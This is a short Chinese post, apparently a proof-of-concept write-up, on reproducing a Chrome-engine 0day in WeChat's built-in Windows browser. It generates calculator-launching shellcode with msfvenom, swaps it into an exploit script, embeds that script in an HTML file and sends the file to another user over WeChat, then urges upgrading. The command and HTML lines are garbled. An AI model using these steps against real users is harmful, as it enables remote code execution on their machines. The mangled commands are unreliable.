这个漏洞其实和我前几天在微头条上发的chome 0day有关。内置的微信浏览器是chome的内核,默认开启沙盒模式。让我们简单地重现一下:
1.为运行计算器生成外壳代码
kali下:MSF venom-f cs harp-ax86-platform windows-o calc . cs harp-pwindows/execmd = calc.exe
第二,将exp中的shellcode替换为图中的js地址。
3.创建一个html文件来调用js
lt脚本src = # 34wx.js # 34 gt lt/script gt;第四,用微信发给别人。
测试截图
请尽快升级。好像微信被强行更新了,但是win10应用商店的微信没有被强行更新。
